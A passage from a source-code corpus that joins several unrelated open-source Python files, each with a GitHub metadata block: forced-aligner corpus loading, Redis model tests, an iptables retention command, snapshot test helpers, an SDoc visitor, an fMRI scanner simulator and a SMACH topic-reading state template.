                    break
                wav_path = None
                transcription_path = None
                if file_name in all_sound_files:
                    wav_path = all_sound_files[file_name]
                # .lab transcriptions win over TextGrids when both exist
                if file_name in exts.lab_files:
                    lab_name = exts.lab_files[file_name]
                    transcription_path = os.path.join(root, lab_name)
                elif file_name in exts.textgrid_files:
                    tg_name = exts.textgrid_files[file_name]
                    transcription_path = os.path.join(root, tg_name)
                if wav_path is None and transcription_path is None:  # Not a file for MFA
                    continue
                if wav_path is None:
                    # Transcription without audio cannot be processed; skip it
                    continue
                self.job_queue.put((file_name, wav_path, transcription_path, relative_path))
                self.file_counts.increment()
        self.finished_adding.stop()
class CorpusProcessWorker(mp.Process):
    """
    Multiprocessing corpus loading worker
    Attributes
    ----------
    job_q: :class:`~multiprocessing.Queue`
        Job queue for files to process
    return_dict: dict
        Dictionary to catch errors
    return_q: :class:`~multiprocessing.Queue`
        Return queue for processed Files
    stopped: :class:`~montreal_forced_aligner.utils.Stopped`
        Stop check for whether corpus loading should exit
    finished_adding: :class:`~montreal_forced_aligner.utils.Stopped`
        Signal that the main thread has stopped adding new files to be processed
    """
    def __init__(
        self,
        name: int,
        job_q: mp.Queue,
        return_q: mp.Queue,
        stopped: Stopped,
        finished_adding: Stopped,
        speaker_characters: Union[int, str],
        sanitize_function: Optional[MultispeakerSanitizationFunction],
        sample_rate: Optional[int],
    ):
        mp.Process.__init__(self)
        self.name = str(name)
        self.job_q = job_q
        self.return_q = return_q
        self.stopped = stopped
        self.finished_adding = finished_adding
        self.finished_processing = Stopped()
        self.sanitize_function = sanitize_function
        self.speaker_characters = speaker_characters
        self.sample_rate = sample_rate
    def run(self) -> None:
        """
        Run the corpus loading job

        Pulls ``(file_name, wav_path, text_path, relative_path)`` tuples off
        ``job_q`` until the producer signals ``finished_adding`` and the queue
        drains.  Parsed files are put on ``return_q`` directly; known parse
        failures are put on ``return_q`` as ``(error_category, exception)``
        tuples; any other exception stops the whole load.
        """
        while True:
            try:
                file_name, wav_path, text_path, relative_path = self.job_q.get(timeout=1)
            except Empty:
                # Queue drained: exit if the producer is done, otherwise poll again.
                if self.finished_adding.stop_check():
                    break
                continue
            if self.stopped.stop_check():
                # A stop was requested: keep draining the queue without processing.
                continue
            try:
                file = FileData.parse_file(
                    file_name,
                    wav_path,
                    text_path,
                    relative_path,
                    self.speaker_characters,
                    self.sanitize_function,
                    self.sample_rate,
                )
                self.return_q.put(file)
            except TextParseError as e:
                self.return_q.put(("decode_error_files", e))
            except TextGridParseError as e:
                self.return_q.put(("textgrid_read_errors", e))
            except SoundFileError as e:
                self.return_q.put(("sound_file_errors", e))
            except Exception as e:
                # Unknown error: abort the whole corpus load and report it.
                self.stopped.stop()
                self.return_q.put(("error", e))
        self.finished_processing.stop()
        return
class Job:
    """
    Class representing information about corpus jobs that will be run in parallel.
    Jobs have a set of speakers that they will process, along with all files and utterances associated with that speaker.
    As such, Jobs also have a set of dictionaries that the speakers use, and argument outputs are largely dependent on
    the pronunciation dictionaries in use.
    Parameters
    ----------
    name: int
        Job number is the job's identifier
    db_engine: sqlalchemy.engine.Engine
        Database engine to use in looking up relevant information
    Attributes
    ----------
    dictionary_ids: list[int]
        List of dictionary ids that the job's speakers use
    """
    name: int
    def __init__(self, name: int, db_engine: sqlalchemy.engine.Engine):
        self.name = name
        self.db_engine = db_engine
        self.dictionary_ids = []
        with Session(self.db_engine) as session:
            self.refresh_dictionaries(session)
        self.has_data = True
    def refresh_dictionaries(self, session: Session) -> None:
        """
        Refresh the dictionaries that will be processed by this job
        Parameters
        ----------
        session: :class:`~sqlalchemy.orm.session.Session`
            Session to use for refreshing
        """
        # Distinct dictionary ids over all speakers assigned to this job
        job_dict_query = (
            session.query(Speaker.dictionary_id).filter(Speaker.job_id == self.name).distinct()
        )
        self.dictionary_ids = [x[0] for x in job_dict_query]
    def construct_path_dictionary(
        self, directory: str, identifier: str, extension: str
    ) -> Dict[str, str]:
        """
        Helper function for constructing dictionary-dependent paths for the Job
        Parameters
        ----------
        directory: str
            Directory to use as the root
        identifier: str
            Identifier for the path name, like ali or acc
        extension: str
            Extension of the path, like .scp or .ark
        Returns
        -------
        dict[str, str]
            Path for each dictionary
        """
        output = {}
        for dict_id in self.dictionary_ids:
            if dict_id is None:
                # No dictionary id: omit the dictionary component of the name
                output[dict_id] = os.path.join(directory, f"{identifier}.{self.name}.{extension}")
            else:
                output[dict_id] = os.path.join(
                    directory, f"{identifier}.{dict_id}.{self.name}.{extension}"
                )
        return output
    def construct_path(self, directory: str, identifier: str, extension: str) -> str:
        """
        Helper function for constructing dictionary-dependent paths for the Job
        Parameters
        ----------
        directory: str
            Directory to use as the root
        identifier: str
            Identifier for the path name, like ali or acc
        extension: str
            Extension of the path, like .scp or .ark
        Returns
        -------
        str
            Path
        """
        return os.path.join(directory, f"{identifier}.{self.name}.{extension}")
    def construct_dictionary_dependent_paths(
        self, directory: str, identifier: str, extension: str
    ) -> Dict[str, str]:
        """
        Helper function for constructing paths that depend only on the dictionaries of the job, and not the job name itself.
        These paths should be merged with all other jobs to get a full set of dictionary paths.
        Parameters
        ----------
        directory: str
            Directory to use as the root
        identifier: str
            Identifier for the path name, like ali or acc
        extension: str
            Extension of the path, like .scp or .ark
        Returns
        -------
        dict[str, str]
            Path for each dictionary
        """
        output = {}
        for dict_id in self.dictionary_ids:
            output[dict_id] = os.path.join(directory, f"{identifier}.{dict_id}.{extension}")
        return output
    @property
    def dictionary_count(self) -> int:
        """Number of dictionaries currently used"""
        return len(self.dictionary_ids)
    def output_for_features(self, split_directory: str, session) -> None:
        """
        Output the necessary files for Kaldi to generate features
        Parameters
        ----------
        split_directory: str
            Split directory for the corpus
        session: :class:`~sqlalchemy.orm.session.Session`
            Database session used to look up sound files and utterances
        """
        wav_scp_path = self.construct_path(split_directory, "wav", "scp")
        segments_scp_path = self.construct_path(split_directory, "segments", "scp")
        if os.path.exists(segments_scp_path):
            # Already generated for this job; nothing to do
            return
        with mfa_open(wav_scp_path, "w") as wav_file:
            files = (
                session.query(File.id, SoundFile.sox_string, SoundFile.sound_file_path)
                .join(File.speakers)
                .join(SpeakerOrdering.speaker)
                .join(File.sound_file)
                .distinct()
                .filter(Speaker.job_id == self.name)
                .order_by(File.id.cast(sqlalchemy.String))
            )
            for f_id, sox_string, sound_file_path in files:
                if not sox_string:
                    # No sox preprocessing pipeline stored; point at the raw file
                    sox_string = sound_file_path
                wav_file.write(f"{f_id} {sox_string}\n")
        with mfa_open(segments_scp_path, "w") as segments_file:
            utterances = (
                session.query(
                    Utterance.kaldi_id,
                    Utterance.file_id,
                    Utterance.begin,
                    Utterance.end,
                    Utterance.channel,
                )
                .join(Utterance.speaker)
                .filter(Speaker.job_id == self.name)
                .order_by(Utterance.kaldi_id)
            )
            for u_id, f_id, begin, end, channel in utterances:
                segments_file.write(f"{u_id} {f_id} {begin} {end} {channel}\n")
    def output_to_directory(self, split_directory: str, session, subset=False) -> None:
        """
        Output job information to a directory
        Parameters
        ----------
        split_directory: str
            Directory to output to
        session: :class:`~sqlalchemy.orm.session.Session`
            Database session used to look up utterances and speakers
        subset: bool
            Restrict output to utterances flagged as being in the current subset
        """
        if self.dictionary_ids:
            # for/else: only skip regeneration when the utt2spk scp already
            # exists for *every* dictionary of this job
            for dict_id in self.dictionary_ids:
                dict_pattern = f"{self.name}"
                if dict_id is not None:
                    dict_pattern = f"{dict_id}.{self.name}"
                scp_path = os.path.join(split_directory, f"utt2spk.{dict_pattern}.scp")
                if not os.path.exists(scp_path):
                    break
            else:
                return
        data = {}
        utterances = (
            session.query(
                Utterance.id,
                Utterance.speaker_id,
                Utterance.features,
                Utterance.normalized_text,
                Utterance.normalized_text_int,
                Speaker.cmvn,
                Speaker.dictionary_id,
            )
            .join(Utterance.speaker)
            .filter(Speaker.job_id == self.name)
            .filter(Utterance.ignored == False)  # noqa
            .order_by(Utterance.kaldi_id)
        )
        if subset:
            utterances = utterances.filter(Utterance.in_subset == True)  # noqa
        if utterances.count() == 0:
            return
        for (
            u_id,
            s_id,
            features,
            normalized_text,
            normalized_text_int,
            cmvn,
            dictionary_id,
        ) in utterances:
            if dictionary_id not in data:
                # One bucket of Kaldi mapping tables per dictionary
                data[dictionary_id] = {
                    "spk2utt": {},
                    "feats": {},
                    "cmvns": {},
                    "utt2spk": {},
                    "text_ints": {},
                    "texts": {},
                }
            utterance = str(u_id)
            speaker = str(s_id)
            # Kaldi utterance ids are prefixed with the speaker id
            utterance = f"{speaker}-{utterance}"
            if speaker not in data[dictionary_id]["spk2utt"]:
                data[dictionary_id]["spk2utt"][speaker] = []
            data[dictionary_id]["spk2utt"][speaker].append(utterance)
            data[dictionary_id]["utt2spk"][utterance] = speaker
            data[dictionary_id]["feats"][utterance] = features
            data[dictionary_id]["cmvns"][speaker] = cmvn
            data[dictionary_id]["text_ints"][utterance] = normalized_text_int
            data[dictionary_id]["texts"][utterance] = normalized_text
        # Write one set of scp files per dictionary, keys sorted as Kaldi expects
        for dict_id, d in data.items():
            dict_pattern = f"{self.name}"
            if dict_id is not None:
                dict_pattern = f"{dict_id}.{self.name}"
            scp_path = os.path.join(split_directory, f"spk2utt.{dict_pattern}.scp")
            with mfa_open(scp_path, "w") as f:
                for speaker in sorted(d["spk2utt"].keys()):
                    utts = " ".join(sorted(d["spk2utt"][speaker]))
                    f.write(f"{speaker} {utts}\n")
            scp_path = os.path.join(split_directory, f"cmvn.{dict_pattern}.scp")
            with mfa_open(scp_path, "w") as f:
                for speaker in sorted(d["cmvns"].keys()):
                    f.write(f"{speaker} {d['cmvns'][speaker]}\n")
            scp_path = os.path.join(split_directory, f"utt2spk.{dict_pattern}.scp")
            with mfa_open(scp_path, "w") as f:
                for utt in sorted(d["utt2spk"].keys()):
                    f.write(f"{utt} {d['utt2spk'][utt]}\n")
            scp_path = os.path.join(split_directory, f"feats.{dict_pattern}.scp")
            with mfa_open(scp_path, "w") as f:
                for utt in sorted(d["feats"].keys()):
                    f.write(f"{utt} {d['feats'][utt]}\n")
            scp_path = os.path.join(split_directory, f"text.{dict_pattern}.int.scp")
            with mfa_open(scp_path, "w") as f:
                for utt in sorted(d["text_ints"].keys()):
                    f.write(f"{utt} {d['text_ints'][utt]}\n")
            scp_path = os.path.join(split_directory, f"text.{dict_pattern}.scp")
            with mfa_open(scp_path, "w") as f:
                for utt in sorted(d["texts"].keys()):
                    f.write(f"{utt} {d['texts'][utt]}\n")
| {
"content_hash": "9bb2e3749c0b0cef54f689f02006dde2",
"timestamp": "",
"source": "github",
"line_count": 468,
"max_line_length": 124,
"avg_line_length": 36.94444444444444,
"alnum_prop": 0.5499132446500867,
"repo_name": "MontrealCorpusTools/Montreal-Forced-Aligner",
"id": "c878121d7af0dd6b5268bd7e6c90f1fe7fa2ff4f",
"size": "17290",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "montreal_forced_aligner/corpus/multiprocessing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "95"
},
{
"name": "F*",
"bytes": "414"
},
{
"name": "Python",
"bytes": "1430732"
}
],
"symlink_target": ""
} |
import json
from redact.model import dump
from redact.model import load
from redact.model import save
from redact.db import get_redis_conn
from fixtures import model
from fixtures import saved_model
from fixtures import TestModel
from fixtures import TestMigratedModel
from fixtures import TestRemoteModel
### Tests
def test_model_load(saved_model):
    """A saved model can be re-loaded from redis with all fields intact."""
    assert len(get_redis_conn().keys(saved_model.key)) == 1
    reloaded = TestModel('test_model_1')
    load(reloaded)
    for attr in ('test_str_1', 'test_str_2', 'test_str_3'):
        assert getattr(reloaded, attr) == getattr(saved_model, attr)
def test_model_save(model):
    """save() creates exactly one redis hash holding the JSON-encoded fields."""
    assert len(get_redis_conn().keys(model.key)) == 0
    save(model)
    assert len(get_redis_conn().keys(model.key)) == 1
    stored = get_redis_conn().hgetall(model.key)
    assert stored is not None
    for field, attr in (('t1', 'test_str_1'), ('t2', 'test_str_2'), ('t3', 'test_str_3')):
        assert getattr(model, attr) == json.loads(stored[field])
def test_model_dump(model):
    """dump() serializes the model fields to a JSON document."""
    roundtripped = json.loads(dump(model))
    for attr in ('test_str_1', 'test_str_2', 'test_str_3'):
        assert getattr(model, attr) == roundtripped[attr]
def test_model_migration(saved_model):
    """Loading a version-0 model runs migrations exactly once."""
    assert saved_model.version == 0
    migrated = TestMigratedModel('test_model_1')
    load(migrated)
    for attr in ('test_str_1', 'test_str_2', 'test_str_3'):
        assert getattr(migrated, attr) == getattr(saved_model, attr)
    assert migrated.test_extra_value_1 == "TEST_MIGRATION_VALUE_1"
    assert migrated.test_extra_value_2 == "TEST_MIGRATION_VALUE_2"
    assert migrated.version == 2
    # Overwrite the migrated defaults and save; a subsequent load must NOT
    # re-run the migration (which would restore the TEST_MIGRATION_* values).
    migrated.test_extra_value_1 = 'different value 1'
    migrated.test_extra_value_2 = 'different value 2'
    save(migrated)
    reread = TestMigratedModel('test_model_1')
    load(reread)
    assert reread.test_extra_value_1 != "TEST_MIGRATION_VALUE_1"
    assert reread.test_extra_value_2 != "TEST_MIGRATION_VALUE_2"
    assert reread.test_extra_value_1 == migrated.test_extra_value_1
    assert reread.test_extra_value_2 == migrated.test_extra_value_2
    assert reread.version == 2
def test_model_remote_key_value(saved_model):
    """A remote key stored on a model can be used to load the remote model."""
    base = TestModel('test_model_1')
    load(base)
    remote = TestRemoteModel(base.test_remote_key_value)
    load(remote)
    assert remote.test_str_1 == 'd'
| {
"content_hash": "10f23531fab07ca6e9ee1521dbafad8f",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 81,
"avg_line_length": 37.945205479452056,
"alnum_prop": 0.7090252707581227,
"repo_name": "df3n5/redact-py",
"id": "c1c0ee35d7d48659b44d7686f7996eb3f2353742",
"size": "2770",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31693"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from app.models import Forwarding
import datetime
class Command(BaseCommand):
    """Management command that disables forwarding rules older than a cutoff."""
    help = "Trigger IPtables retention."

    def add_arguments(self, parser):
        # Optional tunnel ids to restrict retention to; default cutoff is 24h.
        parser.add_argument('tunnel', nargs='*', type=int)
        parser.add_argument('--time', default=(60 * 60 * 24), type=int)

    def handle(self, *args, **kwargs):
        # Rules not updated since this instant are considered stale.
        cutoff = (
            datetime.datetime.utcnow() -
            datetime.timedelta(seconds=kwargs['time'])
        )
        filters = {'updated_at__lt': cutoff}
        if kwargs['tunnel']:
            filters['tunnel_id__in'] = kwargs['tunnel']
        for rule in Forwarding.objects.filter(**filters):
            self.stdout.write("Disabling %s..." % rule)
            rule.disable()
| {
"content_hash": "6b77a53ffd620273386290a26124de3a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 71,
"avg_line_length": 32.041666666666664,
"alnum_prop": 0.599479843953186,
"repo_name": "dimrozakis/vpn-proxy",
"id": "323016df9d1a6b648193cc01e1677db8c5a8afc2",
"size": "769",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vpn-proxy/app/management/commands/retain_iptables.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "45228"
},
{
"name": "Shell",
"bytes": "10401"
}
],
"symlink_target": ""
} |
import io
from PIL import Image
import nose.tools as nt
from datadog.util.compat import url_lib
# For Python3 compat
try:
xrange
except NameError:
xrange = range
def read_image_as_raster(img_url):
    """ Reads image data from URL in raster format.

    Returns a flat list of pixel values, scanning column by column
    (all pixels of column x=0, then x=1, ...).
    """
    response = url_lib.urlopen(img_url)
    try:
        image_file = io.BytesIO(response.read())
    finally:
        # Bugfix: the original rebound the name holding the HTTP response to
        # the PIL image and never closed the connection.
        response.close()
    img = Image.open(image_file)
    w, h = img.size
    pixels = img.load()
    # Use xrange consistently (aliased to range on Python 3 at module top);
    # the original mixed range and xrange in the same comprehension.
    return [pixels[x, y] for x in xrange(w) for y in xrange(h)]
def assert_snap_not_blank(snapshot_url):
    """ Asserts snapshot is not blank (a real image with more than two distinct colors)."""
    pixels = read_image_as_raster(snapshot_url)
    looks_valid = (
        pixels is not None
        and isinstance(pixels, list)
        and len(set(pixels)) > 2
    )
    nt.ok_(looks_valid, msg="Invalid or blank snapshot: {0}".format(snapshot_url))
    for pixel in set(pixels):
        nt.ok_(isinstance(pixel, tuple),
               msg="Invalid snapshot: {0}".format(snapshot_url))
def assert_snap_has_no_events(snapshot_url):
    """ Asserts snapshot has no events (no pixel of the event highlight color 255,230,230)."""
    pixels = read_image_as_raster(snapshot_url)
    for color in set(pixels):
        # NOTE(review): assumes RGBA pixels -- confirm snapshot image mode.
        r, g, b, a = color  # red, green, blue, alpha
        # Bugfix: the original condition `r != 255 or g != 230 and b != 230`
        # parsed as `r != 255 or (g != 230 and b != 230)` due to operator
        # precedence, so any pixel with r==255 and g==230 failed the assert
        # even when b differed from the event color.
        nt.ok_((r, g, b) != (255, 230, 230),
               msg="Snapshot should not have events: {0}".format(snapshot_url))
| {
"content_hash": "5330b2ed79a803272d4c2df9b1305175",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 79,
"avg_line_length": 29.674418604651162,
"alnum_prop": 0.6261755485893417,
"repo_name": "jofusa/datadogpy",
"id": "33cc20d92aab4c1e37f12b4d970adf33b04bc34c",
"size": "1276",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tests/util/snapshot_test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "259510"
},
{
"name": "Ruby",
"bytes": "333"
}
],
"symlink_target": ""
} |
from typing import Optional
from antlr4.Token import CommonToken
from cleo.styles import OutputStyle
class SDocVisitor:
    """
    Parent visitor for SDoc level 1 & 2.
    """

    # ------------------------------------------------------------------------------------------------------------------
    def __init__(self, io: OutputStyle):
        """
        Object constructor.

        :param cleo.styles.OutputStyle io: The styled output formatter.
        """
        self._io: OutputStyle = io
        """
        Styled output formatter.
        """

        self._errors: int = 0
        """
        The error count.
        """

    # ------------------------------------------------------------------------------------------------------------------
    @property
    def errors(self) -> int:
        """
        Getter for the error count.
        """
        return self._errors

    # ------------------------------------------------------------------------------------------------------------------
    def _error(self, message: str, token: Optional[CommonToken] = None) -> None:
        """
        Logs an error and increments the error count.

        :param str message: The error message. When a token is given, the token's position is appended to the output.
        :param antlr4.Token.CommonToken token: The token where the error occurred, if any.
        """
        self._errors += 1

        messages = [message]
        if token:
            # Bugfix: only dereference the token when one was actually supplied.
            # The original read the token attributes before this check and
            # raised AttributeError whenever token was None.
            filename = token.getInputStream().fileName  # Replace fileName with get_source_name() when implemented in ANTLR.
            line_number = token.line
            column_number = token.column + 1
            messages.append('Position: {0!s}:{1:d}.{2:d}'.format(filename, line_number, column_number))
        self._io.error(messages)
# ----------------------------------------------------------------------------------------------------------------------
| {
"content_hash": "98555aeaedeeded412f04e869eadf6bd",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 120,
"avg_line_length": 33.407407407407405,
"alnum_prop": 0.4229490022172949,
"repo_name": "SDoc/py-sdoc",
"id": "065cd3b233165573fb67c3575abbecee79e6781b",
"size": "1925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdoc/sdoc/SDocVisitor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ANTLR",
"bytes": "7968"
},
{
"name": "Python",
"bytes": "406820"
}
],
"symlink_target": ""
} |
""" Simulate the output from Pyneal Scanner
During a real-time scan, Pyneal Scanner will send data to pyneal over a socket
connection. Each transmission comes in 2 phases: first a json header with
metadata about the volume, then the volume itself. This tool will emulate that
same behavior
You can either supply real 4D image data (as .nii/.nii.gz), or use this tool
to generate a fake dataset of random values.
Set the scan parameters below to indicate the dimensions of your
simulated data (i.e. slice dimensions, number of slices per volume,
number of timepts)
"""
# python 2/3 compatibility
from __future__ import print_function
from __future__ import division
from builtins import input
import time
import json
import argparse
import zmq
import numpy as np
import nibabel as nib
def prepRealDataset(image_path):
    """ Prepare a real, existing dataset for use with the simulator

    Loads the 4D image at `image_path` and reorients it to RAS+.

    Parameters
    ----------
    image_path : string
        full path to the dataset you want to use

    Returns
    -------
    nibabel-like image with orientation set to RAS+
    """
    print('Prepping dataset: {}'.format(image_path))
    # Load and immediately reorient to closest canonical (RAS+) orientation
    dataset = nib.as_closest_canonical(nib.load(image_path))
    print('Dimensions: {}'.format(dataset.shape))
    return dataset
def prepRandomDataset(dims):
    """ Prepare a randomized dataset for use with the simulator

    Builds a uint16 volume of random values in [1000, 3000) with shape `dims`
    and wraps it in a Nifti image with an identity (RAS+) affine.

    Parameters
    ----------
    dims : list (4 items)
        dimensions of the simulated dataset [x, y, z, t]

    Returns
    -------
    ds : nibabel-like image
        Nibabel dataset
    """
    print('Prepping randomized dataset')
    voxels = np.random.randint(low=1000,
                               high=3000,
                               size=tuple(dims),
                               dtype='uint16')
    # Identity affine == RAS+ orientation
    ds = nib.Nifti1Image(voxels, np.eye(4))
    print('Randomized Dataset')
    print('Dimensions: {}'.format(ds.shape))
    return ds
def pynealScannerSimulator(dataset, TR=1000, host='127.0.0.1', port=5555):
    """ Pyneal Scanner Simulator
    Simulate Pyneal Scanner by sending the supplied dataset to Pyneal via
    socket one volume at a time. Rate set by 'TR' argument. Each volume
    preceded with a json header with metadata about volume, just like during a
    real scan
    Parameters
    ----------
    dataset : nibabel-like image
        Nibabel like image representing the dataset you'd like to use for the
        simulation
    TR : int, optional
        TR to send the data at. In ms (default: 1000)
    host : string, optional
        Host IP address of Pyneal server. Pyneal Scanner will send data to this
        address (default: '127.0.0.1')
    port : int
        Port number to use for sending data to Pyneal
    """
    print('TR: {}'.format(TR))
    # convert TR to sec (the unit of time.sleep())
    TR = TR / 1000
    # Create socket, bind to address
    print('Connecting to Pyneal at {}:{}'.format(host, port))
    context = zmq.Context.instance()
    socket = context.socket(zmq.PAIR)
    socket.connect('tcp://{}:{}'.format(host, port))
    ds_array = dataset.get_fdata()
    ds_affine = dataset.affine
    # Wait for pyneal to connect to the socket
    # (handshake: keep sending a greeting until pyneal echoes it back)
    print('waiting for connection...')
    while True:
        msg = 'hello from pynealScanner_sim'
        socket.send_string(msg)
        resp = socket.recv_string()
        if resp == msg:
            print('connected to pyneal')
            break
    # Press Enter to start sending data
    input('Press ENTER to begin the "scan" ')
    # sleep for 1TR to account for first volume being collected
    time.sleep(TR)
    # Start sending data!
    for volIdx in range(ds_array.shape[3]):
        startTime = time.time()
        # grab this volume from the dataset
        # (ascontiguousarray so the raw buffer can be sent over the socket)
        thisVol = np.ascontiguousarray(ds_array[:, :, :, volIdx])
        # build header (note: TR is reported back in ms)
        volHeader = {'volIdx': volIdx,
                     'dtype': str(thisVol.dtype),
                     'shape': thisVol.shape,
                     'affine': json.dumps(ds_affine.tolist()),
                     'TR': str(TR*1000)}
        # send header as json
        socket.send_json(volHeader, zmq.SNDMORE)
        # now send the voxel array for this volume
        socket.send(thisVol, flags=0, copy=False, track=False)
        print('Sent vol: {}'.format(volIdx))
        # list for response
        socketResponse = socket.recv_string()
        print('Socket Response: {}'.format(socketResponse))
        if TR > 0:
            # Pace the loop so one volume goes out per TR.
            # NOTE(review): if a send/recv round-trip ever takes longer than
            # TR, (TR - elapsedTime) is negative and time.sleep() raises
            # ValueError -- consider clamping to 0.
            elapsedTime = time.time() - startTime
            time.sleep(TR - elapsedTime)
    # close the socket
    context.destroy()
# run from command line
if __name__ == '__main__':
    # Build the command-line interface
    arg_parser = argparse.ArgumentParser(description="Pyneal-Scanner Simulator",
                                         formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    arg_parser.add_argument('-f', '--filePath',
                            nargs=1,
                            help='path to 4D nifti file')
    arg_parser.add_argument('-r', '--random',
                            action='store_true',
                            help='flag to generate random data')
    arg_parser.add_argument('-d', '--dims',
                            nargs=4,
                            default=[64, 64, 18, 60],
                            type=int,
                            help='dimensions of randomly generated dataset: x y z t')
    arg_parser.add_argument('-t', '--TR',
                            default=1000,
                            type=int,
                            help='TR (in ms)')
    arg_parser.add_argument('-sh', '--sockethost',
                            default='127.0.0.1',
                            help='Pyneal socket host')
    arg_parser.add_argument('-sp', '--socketport',
                            default=5555,
                            help='Pyneal socket port')
    settings = arg_parser.parse_args()
    # Use the supplied nifti file when given, otherwise generate random data
    dataset = (prepRealDataset(settings.filePath[0]) if settings.filePath
               else prepRandomDataset(settings.dims))
    # Hand off to the simulator
    pynealScannerSimulator(dataset,
                           TR=settings.TR,
                           host=settings.sockethost,
                           port=settings.socketport)
| {
"content_hash": "fe6f8f9911946fb3a60391bf52734059",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 92,
"avg_line_length": 31.27358490566038,
"alnum_prop": 0.5779788838612367,
"repo_name": "jeffmacinnes/pyneal",
"id": "85b09441b8cc7c777057d8b7e6b727691fa37d47",
"size": "6630",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/simulation/pynealScanner_sim.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7821"
},
{
"name": "HTML",
"bytes": "2219"
},
{
"name": "JavaScript",
"bytes": "23040"
},
{
"name": "MATLAB",
"bytes": "286017"
},
{
"name": "Python",
"bytes": "423023"
},
{
"name": "Shell",
"bytes": "1522"
}
],
"symlink_target": ""
} |
"""
Lonely Planet Models
"""
from __future__ import absolute_import
| {
"content_hash": "1a2e931e3a1aeac2b594215b6467ea69",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 38,
"avg_line_length": 17,
"alnum_prop": 0.7058823529411765,
"repo_name": "jricardo27/travelhelper",
"id": "a73e55be645c8b5009c8ff58104f87daf5b3ccba",
"size": "68",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "travelhelper/apps/lonelyplanet/models/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "161"
},
{
"name": "HTML",
"bytes": "28104"
},
{
"name": "Python",
"bytes": "175574"
},
{
"name": "Shell",
"bytes": "633"
}
],
"symlink_target": ""
} |
{% block meta %}
name: ReadTopicState
description:
SMACH state that reads data from a ROS topic.
language: Python
framework: SMACH
type: State
tags: [core]
includes: []
extends:
- WaitForMsgState
variables:
- input_keys:
description:
Other than the 'topic' input_key, which specifies the topic to be read,
remaining input_keys are assumed to be used by the optionally specified
callback functions.
type: list of str
- - output_keys:
description:
If any of the output_keys ['output', 'msg', 'output_msg', 'msg_output']
are specified, the read topic data will be written to them.
Any remaining output_keys are assumed to be used for each optionally
specified and correspondingly named callback function.
type: list of str
- - callbacks:
description:
Either callback function names or backtick-wrapped lambda functions
for possible modifications to the topic reading procedure.
type: dict of str
input_keys:
- topic:
description:
The name of the topic from which the data should be read.
type: str
output_keys:
- - output:
description:
The default output key for the topic data.
type: str
- msg:
description:
A possible output key for the topic data.
type: str
- output_msg:
description:
A possible output key for the topic data.
type: str
- msg_output:
description:
A possible output key for the topic data.
type: str
outcomes:
- succeeded
- aborted
{% endblock meta %}
{% extends "WaitForMsgState.tpl.py" %}
{% from "Utils.tpl.py" import import_module, render_init_callbacks, render_execute_callbacks %}
{% block imports %}
{{ super() }}
{{ import_module(defined_headers, 'rostopic') }}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'roslib') }}
{% endblock imports %}
{% block class_defs %}
{{ super() }}
{% if 'class_ReadTopicState' not in defined_headers %}
class ReadTopicState(smach.State):
    # SMACH state that reads a single message from a ROS topic (named by the
    # 'topic' input key) and writes it to the matching output key(s).
    def __init__(self, input_keys=['topic'], output_keys=['output'], callbacks = None):
        # NOTE(review): mutable default arguments are shared across calls;
        # here they are only forwarded to smach.State.__init__, but confirm
        # no caller mutates them.
        smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
        {{ render_init_callbacks() }}
    def execute(self, userdata):
        {{ render_execute_callbacks() }}
        # Get topic name from userdata
        try:
            topic = userdata.topic
        except Exception as e:
            rospy.logerr('Topic name must be specified as a userdata input key: {}'.format(repr(e)))
            return 'aborted'
        # Default to rospy.AnyMsg, whereby the message type will be dynamically detected.
        msg_class = rospy.AnyMsg
        # If the message type is specified in userdata, use it instead of rospy.AnyMsg
        if 'msg_type' in self._input_keys:
            try:
                msg_class = roslib.message.get_message_class(userdata.msg_type)
            except Exception as e:
                rospy.logwarn('Failed to load message class from message type specified in userdata, proceeding with message type/class detection.')
                msg_class = rospy.AnyMsg
                pass
        # Try detecting the message type/class if necessary.
        # See: https://schulz-m.github.io/2016/07/18/rospy-subscribe-to-any-msg-type/
        if msg_class is rospy.AnyMsg:
            try:
                with WaitForMsgState(topic, msg_class, latch=True) as wait_for_any_msg:
                    any_msg = wait_for_any_msg.waitForMsg()
                    # The connection header of the raw message carries the
                    # concrete type name (e.g. 'std_msgs/String').
                    msg_type = any_msg._connection_header['type']
                    rospy.loginfo('Message type for topic {} detected as {}'.format(topic, msg_type))
                    msg_class = roslib.message.get_message_class(msg_type)
            except Exception as e:
                rospy.logerr('Failed to detect message type/class for topic {}: {}'.format(topic, repr(e)))
                return 'aborted'
        # Set up a WaitForMsgState object
        try:
            wait_for_msg = WaitForMsgState(topic, msg_class, latch=True)
        except Exception as e:
            rospy.logerr('Failed to set up WaitForMsgState object for topic {}: {}'.format(topic, repr(e)))
            return 'aborted'
        # Wait for message
        try:
            msg = wait_for_msg.waitForMsg()
        except Exception as e:
            rospy.logwarn('Failed to read message from topic {}: {}'.format(topic, repr(e)))
            return 'aborted'
        # Set msg output key if specified
        for output_key in ['msg', 'output', 'output_msg', 'msg_output']:
            if output_key in self._output_keys:
